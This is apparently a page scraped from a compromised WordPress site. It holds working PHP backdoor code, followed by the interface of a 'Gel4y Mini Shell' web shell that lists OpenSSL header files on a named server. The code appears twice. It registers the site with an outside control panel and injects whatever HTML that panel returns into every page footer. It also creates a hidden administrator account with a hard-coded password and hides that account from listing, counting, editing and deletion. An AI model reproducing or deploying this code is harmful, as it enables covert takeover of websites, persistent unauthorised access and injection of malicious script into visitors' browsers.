function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> Gel4y Mini Shell

Gel4y Mini Shell

PHP Version : 7.4.33
+File +Directory
  • Server : x3immune.vn (157.245.199.161/216.73.216.164)
  • Path: ~/usr/include/openssl/
    Name Size Permission Action
    aes.h 3.271KB -rw-r--r--
    asn1.h 32.839KB -rw-r--r--
    asn1_mac.h 0.386KB -rw-r--r--
    asn1err.h 14.343KB -rw-r--r--
    asn1t.h 32.168KB -rw-r--r--
    async.h 2.342KB -rw-r--r--
    asyncerr.h 1.295KB -rw-r--r--
    bio.h 34.089KB -rw-r--r--
    bioerr.h 6.25KB -rw-r--r--
    blowfish.h 1.804KB -rw-r--r--
    bn.h 21.616KB -rw-r--r--
    bnerr.h 4.853KB -rw-r--r--
    buffer.h 1.563KB -rw-r--r--
    buffererr.h 0.801KB -rw-r--r--
    camellia.h 3.104KB -rw-r--r--
    cast.h 1.635KB -rw-r--r--
    cmac.h 1.039KB -rw-r--r--
    cms.h 15.995KB -rw-r--r--
    cmserr.h 10.898KB -rw-r--r--
    comp.h 1.297KB -rw-r--r--
    comperr.h 1.184KB -rw-r--r--
    conf.h 5.47KB -rw-r--r--
    conf_api.h 1.27KB -rw-r--r--
    conferr.h 3.349KB -rw-r--r--
    crypto.h 16.835KB -rw-r--r--
    cryptoerr.h 2.208KB -rw-r--r--
    ct.h 15.5KB -rw-r--r--
    cterr.h 3.389KB -rw-r--r--
    des.h 7.448KB -rw-r--r--
    dh.h 13.368KB -rw-r--r--
    dherr.h 4.004KB -rw-r--r--
    dsa.h 9.815KB -rw-r--r--
    dsaerr.h 2.902KB -rw-r--r--
    dtls1.h 1.541KB -rw-r--r--
    e_os2.h 8.68KB -rw-r--r--
    ebcdic.h 0.902KB -rw-r--r--
    ec.h 62.105KB -rw-r--r--
    ecdh.h 0.35KB -rw-r--r--
    ecdsa.h 0.35KB -rw-r--r--
    ecerr.h 16.188KB -rw-r--r--
    engine.h 33.849KB -rw-r--r--
    engineerr.h 5.319KB -rw-r--r--
    err.h 11.005KB -rw-r--r--
    evp.h 75.027KB -rw-r--r--
    evperr.h 11.185KB -rw-r--r--
    hmac.h 1.554KB -rw-r--r--
    idea.h 2.05KB -rw-r--r--
    kdf.h 4.225KB -rw-r--r--
    kdferr.h 2.072KB -rw-r--r--
    lhash.h 9.054KB -rw-r--r--
    md2.h 1.029KB -rw-r--r--
    md4.h 1.291KB -rw-r--r--
    md5.h 1.289KB -rw-r--r--
    mdc2.h 1.028KB -rw-r--r--
    modes.h 10.232KB -rw-r--r--
    obj_mac.h 212.424KB -rw-r--r--
    objects.h 6.478KB -rw-r--r--
    objectserr.h 1.285KB -rw-r--r--
    ocsp.h 14.946KB -rw-r--r--
    ocsperr.h 3.277KB -rw-r--r--
    opensslv.h 4.006KB -rw-r--r--
    ossl_typ.h 6.119KB -rw-r--r--
    pem.h 15.105KB -rw-r--r--
    pem2.h 0.405KB -rw-r--r--
    pemerr.h 4.979KB -rw-r--r--
    pkcs12.h 9.64KB -rw-r--r--
    pkcs12err.h 3.661KB -rw-r--r--
    pkcs7.h 11.318KB -rw-r--r--
    pkcs7err.h 4.99KB -rw-r--r--
    rand.h 2.161KB -rw-r--r--
    rand_drbg.h 4.651KB -rw-r--r--
    randerr.h 4.524KB -rw-r--r--
    rc2.h 1.498KB -rw-r--r--
    rc4.h 0.806KB -rw-r--r--
    rc5.h 1.941KB -rw-r--r--
    ripemd.h 1.214KB -rw-r--r--
    rsa.h 21.824KB -rw-r--r--
    rsaerr.h 8.862KB -rw-r--r--
    safestack.h 7.948KB -rw-r--r--
    seed.h 3.397KB -rw-r--r--
    sha.h 3.741KB -rw-r--r--
    srp.h 3.737KB -rw-r--r--
    srtp.h 1.285KB -rw-r--r--
    ssl.h 108.646KB -rw-r--r--
    ssl2.h 0.529KB -rw-r--r--
    ssl3.h 14.234KB -rw-r--r--
    sslerr.h 45.582KB -rw-r--r--
    stack.h 3.022KB -rw-r--r--
    store.h 10.937KB -rw-r--r--
    storeerr.h 4.296KB -rw-r--r--
    symhacks.h 1.28KB -rw-r--r--
    tls1.h 70.791KB -rw-r--r--
    ts.h 21.903KB -rw-r--r--
    tserr.h 6.588KB -rw-r--r--
    txt_db.h 1.627KB -rw-r--r--
    ui.h 15.676KB -rw-r--r--
    uierr.h 2.673KB -rw-r--r--
    whrlpool.h 1.345KB -rw-r--r--
    x509.h 42.112KB -rw-r--r--
    x509_vfy.h 31.425KB -rw-r--r--
    x509err.h 6.618KB -rw-r--r--
    x509v3.h 32.597KB -rw-r--r--
    x509v3err.h 8.571KB -rw-r--r--
    Copyright © 2021 - Powered By Indonesian Darknet